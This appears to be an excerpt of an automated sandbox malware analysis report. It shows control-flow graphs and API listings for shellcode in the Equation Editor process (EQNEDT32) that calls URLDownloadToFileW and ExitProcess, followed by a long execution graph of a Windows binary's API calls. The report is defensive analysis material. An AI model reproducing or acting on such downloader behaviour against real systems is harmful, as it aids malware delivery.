                        • Source File: 00000002.00000002.470067451.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
                        Similarity
                        • API ID: DownloadFile
                        • String ID:
                        • API String ID: 1407266417-0
                        • Opcode ID: 475b3cb6039853e91a38e3e806eaadb71bdb56a5762553a63b290f94377dc8be
                        • Instruction ID: 03cab4445a7d2191a24cde103362af451a8835620f38986af84d1cb909c5cf90
                        • Opcode Fuzzy Hash: 475b3cb6039853e91a38e3e806eaadb71bdb56a5762553a63b290f94377dc8be
                        • Instruction Fuzzy Hash: 112166A550D3D52FD712DB709D6AB45BF647B93600F18CA8E91850F0E3E3A4A205C762

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 171 3520541-3520545 URLDownloadToFileW call 352055e 173 352054a-3520555 171->173 174 35205c3-35205c8 173->174 175 3520557 173->175 176 35205ca-35205ce call 35205db 174->176 177 35205ee-35205f2 174->177 178 35205c2 175->178 179 3520559-352055a 175->179 182 35205d0-35205d2 176->182 181 35205f5 177->181 178->174 179->182 183 352055c-3520585 call 352058c 179->183 185 35205f7-35205fb 181->185 186 35205fd-3520601 181->186 187 35205c1 182->187 188 35205d4-35205d8 182->188 185->186 190 3520609-3520610 185->190 191 3520603-3520607 186->191 192 3520616-3520618 186->192 187->174 194 3520612 190->194 195 3520614 190->195 191->190 191->192 197 3520628-3520629 192->197 194->192 198 352061a-3520623 195->198 200 3520625 198->200 201 35205ec-35205ef 198->201 200->197 201->198 202 35205f1 201->202 202->181
                        APIs
                        • URLDownloadToFileW.URLMON(00000000,035204D9,52DBFD46,00000000,00000000), ref: 03520543
                        Memory Dump Source
                        • Source File: 00000002.00000002.470067451.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
                        Similarity
                        • API ID: DownloadFile
                        • String ID:
                        • API String ID: 1407266417-0
                        • Opcode ID: fe65dfc41c474ed7c68a25bdd3244d0e817b4e5dc4d84330f277ae402f48056e
                        • Instruction ID: d054f27c05fe223d8e963c4453a1227ba74bbace1363340d80afa481843bd91b
                        • Opcode Fuzzy Hash: fe65dfc41c474ed7c68a25bdd3244d0e817b4e5dc4d84330f277ae402f48056e
                        • Instruction Fuzzy Hash: F3118CB570B3123FDB20E614E841B9BFF61BBC3720F48C446E5404B1F5E2A0E4838269

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 203 35205ac-35205b1 ExitProcess 205 35205e7-35205ea 203->205 206 3520625 205->206 207 35205ec-35205ef 205->207 208 3520628-3520629 206->208 209 35205f1-35205f5 207->209 210 352061a-3520623 207->210 212 35205f7-35205fb 209->212 213 35205fd-3520601 209->213 210->205 212->213 214 3520609-3520610 212->214 215 3520603-3520607 213->215 216 3520616-3520618 213->216 217 3520612 214->217 218 3520614 214->218 215->214 215->216 216->208 217->216 218->210
                        APIs
                        • ExitProcess.KERNELBASE(00000000), ref: 035205B1
                        Memory Dump Source
                        • Source File: 00000002.00000002.470067451.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
                        Similarity
                        • API ID: ExitProcess
                        • String ID:
                        • API String ID: 621844428-0
                        • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                        • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                        • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                        • Instruction Fuzzy Hash:

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 219 35205b3-35205be GetPEB 220 35205c1-35205c8 219->220 222 35205ca-35205d2 call 35205db 220->222 223 35205ee-35205f2 220->223 222->220 233 35205d4-35205d8 222->233 225 35205f5 223->225 227 35205f7-35205fb 225->227 228 35205fd-3520601 225->228 227->228 230 3520609-3520610 227->230 231 3520603-3520607 228->231 232 3520616-3520618 228->232 234 3520612 230->234 235 3520614 230->235 231->230 231->232 236 3520628-3520629 232->236 234->232 237 352061a-3520623 235->237 239 3520625 237->239 240 35205ec-35205ef 237->240 239->236 240->237 241 35205f1 240->241 241->225
                        Memory Dump Source
                        • Source File: 00000002.00000002.470067451.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                        • Instruction ID: 2ba1d240497ef77a674ed049511fe225c42123aea9b9580a4b564198025829e4
                        • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                        • Instruction Fuzzy Hash: 7FD052B2303902CFD304DB04D980E22F77AFFD9320B28C269E4004B6A9C730E892CA94

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 242 3520401-3520420 ExitProcess call 352041a 245 3520427-352042b 242->245 246 3520422 call 3520436 242->246 248 352049c-35204a5 245->248 249 352042d-3520430 245->249 246->245 254 35204a8-35204ac 248->254 250 3520433 249->250 251 3520498-352049a 249->251 253 3520435-3520444 250->253 250->254 251->248 255 35204b6-35204ba 253->255 256 3520446-352044b 253->256 257 352052a-3520543 URLDownloadToFileW 255->257 258 35204bc-35204bd 255->258 256->255 259 352044d 256->259 263 352054a-3520555 257->263 264 3520545 call 352055e 257->264 261 35204be-35204c3 258->261 259->261 262 352044f-3520453 259->262 265 35204c9-3520529 call 3520541 261->265 262->254 266 3520455 262->266 268 35205c3-35205c8 263->268 269 3520557 263->269 264->263 265->257 266->265 267 3520457-3520495 call 3520499 266->267 267->251 270 35205ca-35205ce call 35205db 268->270 271 35205ee-35205f2 268->271 272 35205c2 269->272 273 3520559-352055a 269->273 279 35205d0-35205d2 270->279 277 35205f5 271->277 272->268 273->279 280 352055c-3520585 call 352058c 273->280 283 35205f7-35205fb 277->283 284 35205fd-3520601 277->284 285 35205c1 279->285 286 35205d4-35205d8 279->286 283->284 290 3520609-3520610 283->290 291 3520603-3520607 284->291 292 3520616-3520618 284->292 285->268 295 3520612 290->295 296 3520614 290->296 291->290 291->292 299 3520628-3520629 292->299 295->292 300 352061a-3520623 296->300 304 3520625 300->304 305 35205ec-35205ef 300->305 304->299 305->300 308 35205f1 305->308 308->277
                        APIs
                        • ExitProcess.KERNELBASE(035203EF), ref: 03520401
                        Memory Dump Source
                        • Source File: 00000002.00000002.470067451.0000000003520000.00000004.00000020.00020000.00000000.sdmp, Offset: 03520000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_3520000_EQNEDT32.jbxd
                        Similarity
                        • API ID: ExitProcess
                        • String ID:
                        • API String ID: 621844428-0
                        • Opcode ID: d00e3a6fa86848c09d06f117f19e45ef3adef48dd1f10c157b3d2c9b74e72a8a
                        • Instruction ID: 7f8893a5433ffc3becb811283ace14dad68dd6d5c54f3bbced626699b8926600
                        • Opcode Fuzzy Hash: d00e3a6fa86848c09d06f117f19e45ef3adef48dd1f10c157b3d2c9b74e72a8a
                        • Instruction Fuzzy Hash: 4D11AC9580F7E51FCB12E7707EAA065BF64795302075DCADBC0854B2F3D258960693D2

                        Execution Graph

                        Execution Coverage:3.3%
                        Dynamic/Decrypted Code Coverage:1.1%
                        Signature Coverage:3.1%
                        Total number of Nodes:1666
                        Total number of Limit Nodes:43
                        execution_graph 80935 4169e0 80938 41696e TlsGetValue 80935->80938 80939 4169a7 GetModuleHandleW 80938->80939 80940 416986 80938->80940 80942 4169c2 GetProcAddress 80939->80942 80943 4169b7 80939->80943 80940->80939 80941 416990 TlsGetValue 80940->80941 80946 41699b 80941->80946 80945 41699f 80942->80945 80950 41177f Sleep GetModuleHandleW 80943->80950 80948 4169d2 RtlEncodePointer 80945->80948 80949 4169da 80945->80949 80946->80939 80946->80945 80947 4169bd 80947->80942 80947->80949 80948->80949 80950->80947 80951 444343 80954 444326 80951->80954 80953 44434e WriteFile 80955 444340 80954->80955 80956 4442c7 80954->80956 80955->80953 80961 40e190 SetFilePointerEx 80956->80961 80958 4442e0 SetFilePointerEx 80962 40e190 SetFilePointerEx 80958->80962 80960 4442ff 80960->80953 80961->80958 80962->80960 80963 46d22f 80966 46d098 80963->80966 80965 46d241 80967 46d0b5 80966->80967 80968 46d115 80967->80968 80969 46d0b9 80967->80969 81037 45c216 80 API calls 80968->81037 81014 41171a 80969->81014 80973 46d126 80975 46d0f8 80973->80975 80980 46d142 80973->80980 80974 46d0cc 81027 453063 80974->81027 81033 4092c0 80975->81033 80978 46d0fd 80978->80965 80982 46d1c8 80980->80982 80985 46d158 80980->80985 81046 4676a3 80 API calls 80982->81046 80988 453063 113 API calls 80985->80988 80986 46d0ea 80986->80980 80989 46d0ee 80986->80989 80987 46d1ce 81047 4444c2 SetFilePointerEx SetFilePointerEx WriteFile 80987->81047 80997 46d15e 80988->80997 80989->80975 81032 44ade5 CloseHandle ctype 80989->81032 80990 46d18d 81038 467fce 84 API calls 80990->81038 80994 46d196 81039 4013a0 77 API calls 80994->81039 80995 46d1e7 80999 4092c0 VariantClear 80995->80999 81009 46d194 80995->81009 80997->80990 80997->80994 80998 46d1a2 81040 40df50 80998->81040 80999->81009 81003 46d224 81003->80965 81004 46d1b8 81045 467fce 84 API calls 81004->81045 81006 46d216 81048 44ade5 CloseHandle ctype 81006->81048 81009->81003 81010 40d900 81009->81010 81011 40d917 81010->81011 81012 40d909 81010->81012 81011->81012 81013 40d91c CloseHandle 81011->81013 81012->81006 81013->81006 81016 411724 81014->81016 81017 41173e 81016->81017 81021 411740 std::bad_alloc::bad_alloc 81016->81021 81049 4138ba 81016->81049 81067 411afc 7 API calls __decode_pointer 81016->81067 81017->80974 81026 40d940 78 API calls 81017->81026 81020 411770 81072 41805b RaiseException 81020->81072 81025 411766 81021->81025 81068 411421 81021->81068 81024 41177e 81071 4116fd 69 API calls std::exception::exception 81025->81071 81026->80974 81028 45306e 81027->81028 81029 45307a 81027->81029 81028->81029 81201 452e2a 113 API calls 5 library calls 81028->81201 81031 40dfa0 85 API calls 81029->81031 81031->80986 81032->80975 81034 4092c8 ctype 81033->81034 81035 429db0 VariantClear 81034->81035 81036 4092d5 ctype 81034->81036 81035->81036 81036->80978 81037->80973 81038->81009 81039->80998 81041 40df61 81040->81041 81042 40df56 81040->81042 81044 40d3b0 77 API calls 2 library calls 81041->81044 81202 404080 77 API calls _memcpy_s 81042->81202 81044->81004 81045->81009 81046->80987 81047->80995 81048->81003 81050 41396d 81049->81050 81060 4138cc 81049->81060 81080 411afc 7 API calls __decode_pointer 81050->81080 81052 413973 81081 417f23 69 API calls __getptd_noexit 81052->81081 81057 413929 RtlAllocateHeap 81057->81060 81058 4138dd 81058->81060 81073 418252 69 API calls 2 library calls 81058->81073 81074 4180a7 69 API calls 7 library calls 81058->81074 81075 411803 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 81058->81075 81060->81057 81060->81058 81061 413959 81060->81061 81064 41395e 81060->81064 81066 413965 81060->81066 81076 41386b 69 API calls 4 library calls 81060->81076 81077 411afc 7 API calls __decode_pointer 81060->81077 81078 417f23 69 API calls __getptd_noexit 81061->81078 81079 417f23 69 API calls __getptd_noexit 81064->81079 81066->81016 81067->81016 81082 4113e5 81068->81082 81070 41142e 81070->81025 81071->81020 81072->81024 81073->81058 81074->81058 81076->81060 81077->81060 81078->81064 81079->81066 81080->81052 81081->81066 81083 4113f1 __lseeki64 81082->81083 81090 41181b 81083->81090 81089 411412 __lseeki64 81089->81070 81116 418407 81090->81116 81092 4113f6 81093 4112fa 81092->81093 81181 4169e9 TlsGetValue 81093->81181 81096 4169e9 __decode_pointer 7 API calls 81097 41131e 81096->81097 81109 4113a1 81097->81109 81193 4170e7 70 API calls 5 library calls 81097->81193 81099 41133c 81100 411388 81099->81100 81102 411357 81099->81102 81103 411366 81099->81103 81101 41696e __encode_pointer 7 API calls 81100->81101 81104 411396 81101->81104 81194 417047 75 API calls _realloc 81102->81194 81106 411360 81103->81106 81103->81109 81107 41696e __encode_pointer 7 API calls 81104->81107 81106->81103 81110 41137c 81106->81110 81195 417047 75 API calls _realloc 81106->81195 81107->81109 81113 41141b 81109->81113 81112 41696e __encode_pointer 7 API calls 81110->81112 81111 411376 81111->81109 81111->81110 81112->81100 81197 411824 81113->81197 81117 41841c 81116->81117 81118 41842f EnterCriticalSection 81116->81118 81123 418344 81117->81123 81118->81092 81120 418422 81120->81118 81151 4117af 69 API calls 3 library calls 81120->81151 81122 41842e 81122->81118 81124 418350 __lseeki64 81123->81124 81125 418360 81124->81125 81127 418378 81124->81127 81152 418252 69 API calls 2 library calls 81125->81152 81134 418386 __lseeki64 81127->81134 81155 416fb6 81127->81155 81129 418365 81153 4180a7 69 API calls 7 library calls 81129->81153 81132 4183a7 81137 418407 __lock 69 API calls 81132->81137 81133 418398 81161 417f23 69 API calls __getptd_noexit 81133->81161 81134->81120 81135 41836c 81154 411803 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 81135->81154 81139 4183ae 81137->81139 81141 4183e2 81139->81141 81142 4183b6 81139->81142 81143 413a88 __fclose_nolock 69 API calls 81141->81143 81162 4189e6 InitializeCriticalSectionAndSpinCount __lseeki64 81142->81162 81145 4183d3 81143->81145 81177 4183fe LeaveCriticalSection _doexit 81145->81177 81146 4183c1 81146->81145 81163 413a88 81146->81163 81149 4183cd 81176 417f23 69 API calls __getptd_noexit 81149->81176 81151->81122 81152->81129 81153->81135 81158 416fbf 81155->81158 81156 4138ba _malloc 68 API calls 81156->81158 81157 416ff5 81157->81132 81157->81133 81158->81156 81158->81157 81159 416fd6 Sleep 81158->81159 81160 416feb 81159->81160 81160->81157 81160->81158 81161->81134 81162->81146 81164 413a94 __lseeki64 81163->81164 81165 413ad3 81164->81165 81167 418407 __lock 67 API calls 81164->81167 81171 413b0d __dosmaperr __lseeki64 81164->81171 81166 413ae8 HeapFree 81165->81166 81165->81171 81168 413afa 81166->81168 81166->81171 81173 413aab ___sbh_find_block 81167->81173 81180 417f23 69 API calls __getptd_noexit 81168->81180 81170 413aff GetLastError 81170->81171 81171->81149 81172 413ac5 81179 413ade LeaveCriticalSection _doexit 81172->81179 81173->81172 81178 419f9d __VEC_memcpy VirtualFree VirtualFree HeapFree __fptostr 81173->81178 81176->81145 81177->81134 81178->81172 81179->81165 81180->81170 81182 416a01 81181->81182 81183 416a22 GetModuleHandleW 81181->81183 81182->81183 81184 416a0b TlsGetValue 81182->81184 81185 416a32 81183->81185 81186 416a3d GetProcAddress 81183->81186 81191 416a16 81184->81191 81196 41177f Sleep GetModuleHandleW 81185->81196 81192 416a1a 81186->81192 81188 416a38 81188->81186 81189 41130e 81188->81189 81189->81096 81190 416a4d RtlDecodePointer 81190->81189 81191->81183 81191->81192 81192->81189 81192->81190 81193->81099 81194->81106 81195->81111 81196->81188 81200 41832d LeaveCriticalSection 81197->81200 81199 411420 81199->81089 81200->81199 81201->81029 81202->81041 81203 40116e 81204 401119 DefWindowProcW 81203->81204 81205 429212 81210 410b90 81205->81210 81208 411421 __cinit 76 API calls 81209 42922f 81208->81209 81211 410b9a __write_nolock 81210->81211 81212 41171a 77 API calls 81211->81212 81213 410c31 GetModuleFileNameW 81212->81213 81227 413db0 81213->81227 81215 410c66 _wcsncat 81230 413e3c 81215->81230 81218 41171a 77 API calls 81219 410ca3 _wcscpy 81218->81219 81220 410cd1 RegOpenKeyExW 81219->81220 81221 429bc3 RegQueryValueExW 81220->81221 81222 410cf7 81220->81222 81223 429cd9 RegCloseKey 81221->81223 81225 429bf2 _wcscat _wcslen _wcsncpy 81221->81225 81222->81208 81224 41171a 77 API calls 81224->81225 81225->81224 81226 429cd8 81225->81226 81226->81223 81233 413b95 81227->81233 81263 41abec 81230->81263 81234 413c2f 81233->81234 81239 413bae 81233->81239 81235 413d60 81234->81235 81236 413d7b 81234->81236 81259 417f23 69 API calls __getptd_noexit 81235->81259 81261 417f23 69 API calls __getptd_noexit 81236->81261 81239->81234 81244 413c1d 81239->81244 81255 41ab19 69 API calls __set_error_mode 81239->81255 81240 413d65 81242 413cfb 81240->81242 81260 417ebb 7 API calls 2 library calls 81240->81260 81242->81215 81244->81234 81252 413c9b 81244->81252 81256 41ab19 69 API calls __set_error_mode 81244->81256 81245 413d03 81245->81234 81245->81242 81248 413d8e 81245->81248 81246 413cd6 81246->81234 81246->81242 81251 413cef 81246->81251 81247 413cb9 81247->81234 81247->81246 81257 41ab19 69 API calls __set_error_mode 81247->81257 81262 41ab19 69 API calls __set_error_mode 81248->81262 81258 41ab19 69 API calls __set_error_mode 81251->81258 81252->81245 81252->81247 81255->81244 81256->81252 81257->81246 81258->81242 81259->81240 81261->81240 81262->81242 81264 41ac02 81263->81264 81265 41abfd 81263->81265 81272 417f23 69 API calls __getptd_noexit 81264->81272 81265->81264 81268 41ac22 81265->81268 81267 41ac07 81273 417ebb 7 API calls 2 library calls 81267->81273 81270 410c99 81268->81270 81274 417f23 69 API calls __getptd_noexit 81268->81274 81270->81218 81272->81267 81274->81267 81275 401230 81276 401241 _memset 81275->81276 81277 4012c5 81275->81277 81290 401be0 81276->81290 81279 40126b 81280 4012ae KillTimer SetTimer 81279->81280 81281 42aa61 81279->81281 81282 401298 81279->81282 81280->81277 81285 42aa8b Shell_NotifyIconW 81281->81285 81286 42aa69 Shell_NotifyIconW 81281->81286 81283 4012a2 81282->81283 81284 42aaac 81282->81284 81283->81280 81287 42aaf8 Shell_NotifyIconW 81283->81287 81288 42aad7 Shell_NotifyIconW 81284->81288 81289 42aab5 Shell_NotifyIconW 81284->81289 81285->81280 81286->81280 81287->81280 81288->81280 81289->81280 81291 401bfb 81290->81291 81311 401cde 81290->81311 81312 4013a0 77 API calls 81291->81312 81293 401c0b 81294 42a9a0 LoadStringW 81293->81294 81295 401c18 81293->81295 81297 42a9bb 81294->81297 81313 4021e0 81295->81313 81299 40df50 77 API calls 81297->81299 81298 401c2d 81300 401c3a 81298->81300 81301 42a9cd 81298->81301 81308 401c53 _memset _wcscpy _wcsncpy 81299->81308 81300->81297 81302 401c44 81300->81302 81326 40d3b0 77 API calls 2 library calls 81301->81326 81325 40d3b0 77 API calls 2 library calls 81302->81325 81305 42a9dc 81306 42a9f0 81305->81306 81305->81308 81327 40d3b0 77 API calls 2 library calls 81306->81327 81310 401cc2 Shell_NotifyIconW 81308->81310 81309 42a9fe 81310->81311 81311->81279 81312->81293 81314 4021f1 _wcslen 81313->81314 81315 42a598 81313->81315 81318 402205 81314->81318 81319 402226 81314->81319 81330 40c740 81315->81330 81317 42a5a2 81328 404020 77 API calls ctype 81318->81328 81329 401380 77 API calls 81319->81329 81322 40220c _memcpy_s 81322->81298 81323 40222d 81323->81317 81324 41171a 77 API calls 81323->81324 81324->81322 81325->81308 81326->81305 81327->81309 81328->81322 81329->81323 81331 40c752 81330->81331 81332 40c747 81330->81332 81331->81317 81332->81331 81335 402ae0 77 API calls _memcpy_s 81332->81335 81334 42a572 _memcpy_s 81334->81317 81335->81334 81336 4034b0 81337 4034b9 81336->81337 81338 4034bd 81336->81338 81339 41171a 77 API calls 81338->81339 81340 42a0ba 81338->81340 81341 4034fe _memcpy_s ctype 81339->81341 81342 416193 81379 41718c 81342->81379 81344 41619f GetStartupInfoW 81346 4161c2 81344->81346 81380 41aa31 HeapCreate 81346->81380 81348 416212 81382 416e29 GetModuleHandleW 81348->81382 81352 416223 __RTC_Initialize 81416 41b669 81352->81416 81355 416231 81356 41623d GetCommandLineW 81355->81356 81485 4117af 69 API calls 3 library calls 81355->81485 81431 42235f GetEnvironmentStringsW 81356->81431 81359 41623c 81359->81356 81360 41624c 81437 4222b1 GetModuleFileNameW 81360->81437 81362 416256 81365 416261 81362->81365 81486 4117af 69 API calls 3 library calls 81362->81486 81441 422082 81365->81441 81367 416272 81454 41186e 81367->81454 81370 416279 81372 416284 __wwincmdln 81370->81372 81488 4117af 69 API calls 3 library calls 81370->81488 81460 40d7f0 81372->81460 81375 4162b3 81490 411a4b 69 API calls _doexit 81375->81490 81378 4162b8 __lseeki64 81379->81344 81381 416206 81380->81381 81381->81348 81483 41616a 69 API calls 3 library calls 81381->81483 81383 416e44 81382->81383 81384 416e3d 81382->81384 81386 416fac 81383->81386 81387 416e4e GetProcAddress GetProcAddress GetProcAddress GetProcAddress 81383->81387 81491 41177f Sleep GetModuleHandleW 81384->81491 81501 416ad5 72 API calls 2 library calls 81386->81501 81389 416e97 TlsAlloc 81387->81389 81388 416e43 81388->81383 81391 416218 81389->81391 81393 416ee5 TlsSetValue 81389->81393 81391->81352 81484 41616a 69 API calls 3 library calls 81391->81484 81393->81391 81394 416ef6 81393->81394 81492 411a69 7 API calls 3 library calls 81394->81492 81396 416efb 81397 41696e __encode_pointer 7 API calls 81396->81397 81398 416f06 81397->81398 81399 41696e __encode_pointer 7 API calls 81398->81399 81400 416f16 81399->81400 81401 41696e __encode_pointer 7 API calls 81400->81401 81402 416f26 81401->81402 81403 41696e __encode_pointer 7 API calls 81402->81403 81404 416f36 81403->81404 81493 41828b InitializeCriticalSectionAndSpinCount __mtinitlocknum 81404->81493 81406 416f43 81406->81386 81407 4169e9 __decode_pointer 7 API calls 81406->81407 81408 416f57 81407->81408 81408->81386 81494 416ffb 81408->81494 81411 4169e9 __decode_pointer 7 API calls 81412 416f8a 81411->81412 81412->81386 81413 416f91 81412->81413 81500 416b12 69 API calls 5 library calls 81413->81500 81415 416f99 GetCurrentThreadId 81415->81391 81520 41718c 81416->81520 81418 41b675 GetStartupInfoA 81419 416ffb __calloc_crt 69 API calls 81418->81419 81420 41b696 81419->81420 81421 41b8b4 __lseeki64 81420->81421 81423 416ffb __calloc_crt 69 API calls 81420->81423 81426 41b7fb 81420->81426 81430 41b77e 81420->81430 81421->81355 81422 41b831 GetStdHandle 81422->81426 81423->81420 81424 41b896 SetHandleCount 81424->81421 81425 41b843 GetFileType 81425->81426 81426->81421 81426->81422 81426->81424 81426->81425 81522 4189e6 InitializeCriticalSectionAndSpinCount __lseeki64 81426->81522 81428 41b7a7 GetFileType 81428->81430 81430->81421 81430->81426 81430->81428 81521 4189e6 InitializeCriticalSectionAndSpinCount __lseeki64 81430->81521 81432 422370 81431->81432 81433 422374 81431->81433 81432->81360 81433->81433 81434 416fb6 __malloc_crt 69 API calls 81433->81434 81435 422395 _memcpy_s 81434->81435 81436 42239c FreeEnvironmentStringsW 81435->81436 81436->81360 81438 4222e6 _wparse_cmdline 81437->81438 81439 416fb6 __malloc_crt 69 API calls 81438->81439 81440 422329 _wparse_cmdline 81438->81440 81439->81440 81440->81362 81442 42209a _wcslen 81441->81442 81446 416267 81441->81446 81443 416ffb __calloc_crt 69 API calls 81442->81443 81449 4220be _wcslen 81443->81449 81444 422123 81445 413a88 __fclose_nolock 69 API calls 81444->81445 81445->81446 81446->81367 81487 4117af 69 API calls 3 library calls 81446->81487 81447 416ffb __calloc_crt 69 API calls 81447->81449 81448 422149 81450 413a88 __fclose_nolock 69 API calls 81448->81450 81449->81444 81449->81446 81449->81447 81449->81448 81452 422108 81449->81452 81523 426349 69 API calls __set_error_mode 81449->81523 81450->81446 81452->81449 81524 417d93 10 API calls 3 library calls 81452->81524 81455 41187c __IsNonwritableInCurrentImage 81454->81455 81525 418486 81455->81525 81457 41189a __initterm_e 81458 411421 __cinit 76 API calls 81457->81458 81459 4118b9 __IsNonwritableInCurrentImage __initterm 81457->81459 81458->81459 81459->81370 81461 431bcb 81460->81461 81462 40d80c 81460->81462 81463 4092c0 VariantClear 81462->81463 81464 40d847 81463->81464 81529 40eb50 81464->81529 81467 40d877 81535 411ac6 81467->81535 81472 40d891 81545 40f370 KiUserCallbackDispatcher SystemParametersInfoW 81472->81545 81474 40d89f 81546 40d6d0 GetCurrentDirectoryW 81474->81546 81476 40d8a7 SystemParametersInfoW 81477 40d8d4 81476->81477 81478 40d8cd FreeLibrary 81476->81478 81479 4092c0 VariantClear 81477->81479 81478->81477 81480 40d8dd 81479->81480 81481 4092c0 VariantClear 81480->81481 81482 40d8e6 81481->81482 81482->81375 81489 411a1f 69 API calls _doexit 81482->81489 81483->81348 81484->81352 81485->81359 81486->81365 81487->81367 81488->81372 81489->81375 81490->81378 81491->81388 81492->81396 81493->81406 81496 417004 81494->81496 81497 416f70 81496->81497 81498 417022 Sleep 81496->81498 81502 422452 81496->81502 81497->81386 81497->81411 81499 417037 81498->81499 81499->81496 81499->81497 81500->81415 81501->81391 81503 42245e __lseeki64 81502->81503 81504 422476 81503->81504 81513 422495 _memset 81503->81513 81515 417f23 69 API calls __getptd_noexit 81504->81515 81506 42247b 81516 417ebb 7 API calls 2 library calls 81506->81516 81508 422507 RtlAllocateHeap 81508->81513 81510 418407 __lock 68 API calls 81510->81513 81511 42248b __lseeki64 81511->81496 81513->81508 81513->81510 81513->81511 81517 41a74c 5 API calls 2 library calls 81513->81517 81518 42254e LeaveCriticalSection _doexit 81513->81518 81519 411afc 7 API calls __decode_pointer 81513->81519 81515->81506 81517->81513 81518->81513 81519->81513 81520->81418 81521->81430 81522->81426 81523->81449 81524->81452 81526 41848c 81525->81526 81527 41696e __encode_pointer 7 API calls 81526->81527 81528 4184a4 81526->81528 81527->81526 81528->81457 81583 40eb70 81529->81583 81532 40eba0 81533 40eb50 2 API calls 81532->81533 81534 40eba5 81533->81534 81534->81467 81536 418407 __lock 69 API calls 81535->81536 81537 411ad3 81536->81537 81538 4169e9 __decode_pointer 7 API calls 81537->81538 81539 411ade 81538->81539 81540 41696e __encode_pointer 7 API calls 81539->81540 81541 411ae8 81540->81541 81587 41832d LeaveCriticalSection 81541->81587 81543 40d888 81544 411b24 69 API calls __set_error_mode 81543->81544 81544->81472 81545->81474 81588 401f80 81546->81588 81548 40d6f1 IsDebuggerPresent 81549 431a9d MessageBoxA 81548->81549 81550 40d6ff 81548->81550 81551 431ab6 81549->81551 81550->81551 81552 40d71f 81550->81552 81681 403e90 77 API calls 3 library calls 81551->81681 81658 40f3b0 81552->81658 81556 40d73a GetFullPathNameW 81678 401440 129 API calls _wcscat 81556->81678 81558 40d77a 81559 40d782 81558->81559 81560 431b09 SetCurrentDirectoryW 81558->81560 81561 40d78b 81559->81561 81682 43604b 6 API calls 81559->81682 81560->81559 81670 4101f0 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 81561->81670 81565 431b28 81565->81561 81567 431b30 GetModuleFileNameW 81565->81567 81568 431ba4 GetForegroundWindow ShellExecuteW 81567->81568 81569 431b4c 81567->81569 81572 40d7c7 81568->81572 81683 401b70 81569->81683 81570 40d795 81578 40d7a8 81570->81578 81679 40e1e0 99 API calls _memset 81570->81679 81576 40d7d1 SetCurrentDirectoryW 81572->81576 81576->81476 81577 431b66 81690 40d3b0 77 API calls 2 library calls 81577->81690 81578->81572 81680 401000 Shell_NotifyIconW _memset 81578->81680 81581 431b72 GetForegroundWindow ShellExecuteW 81582 431b9f 81581->81582 81582->81572 81584 40d86e 81583->81584 81585 40eb76 LoadLibraryA 81583->81585 81584->81467 81584->81532 81585->81584 81586 40eb87 GetProcAddress 81585->81586 81586->81584 81587->81543 81691 40e680 77 API calls 81588->81691 81590 401f90 81692 402940 77 API calls __write_nolock 81590->81692 81592 401fa2 GetModuleFileNameW 81693 40ff90 81592->81693 81594 401fbd 81705 4107b0 77 API calls 81594->81705 81596 401fd6 81597 401b70 77 API calls 81596->81597 81598 401fe4 81597->81598 81706 4019e0 78 API calls 81598->81706 81600 401ff2 81601 4092c0 VariantClear 81600->81601 81602 402002 81601->81602 81603 401b70 77 API calls 81602->81603 81604 40201c 81603->81604 81707 4019e0 78 API calls 81604->81707 81606 40202c 81607 401b70 77 API calls 81606->81607 81608 40203c 81607->81608 81708 40c3e0 81608->81708 81610 40204d 81726 40c060 81610->81726 81614 40206e 81732 4115d0 81 API calls 2 library calls 81614->81732 81616 40207d 81617 42c174 81616->81617 81618 402088 81616->81618 81743 401a70 77 API calls 81617->81743 81733 4115d0 81 API calls 2 library calls 81618->81733 81621 42c189 81744 401a70 77 API calls 81621->81744 81622 402093 81622->81621 81623 40209e 81622->81623 81734 4115d0 81 API calls 2 library calls 81623->81734 81626 42c1a7 81628 42c1b0 GetModuleFileNameW 81626->81628 81627 4020a9 81627->81628 81629 4020b4 81627->81629 81745 401a70 77 API calls 81628->81745 81735 4115d0 81 API calls 2 library calls 81629->81735 81632 4020bf 81634 402107 81632->81634 81641 42c20a _wcscpy 81632->81641 81736 401a70 77 API calls 81632->81736 81633 42c1e2 81635 40df50 77 API calls 81633->81635 81636 402119 81634->81636 81634->81641 81637 42c1f1 81635->81637 81638 42c243 81636->81638 81738 40e7e0 78 API calls 81636->81738 81746 401a70 77 API calls 81637->81746 81747 401a70 77 API calls 81641->81747 81643 4020e5 _wcscpy 81737 401a70 77 API calls 81643->81737 81644 42c201 81644->81641 81646 402132 81739 40d030 78 API calls 81646->81739 81649 40213e 81650 4092c0 VariantClear 81649->81650 81651 402148 81650->81651 81652 402184 81651->81652 81740 40d030 78 API calls 81651->81740 81741 40e640 78 API calls 81651->81741 81742 401a70 77 API calls 81651->81742 81655 4092c0 VariantClear 81652->81655 81657 402196 ctype 81655->81657 81657->81548 81659 42ccf4 _memset 81658->81659 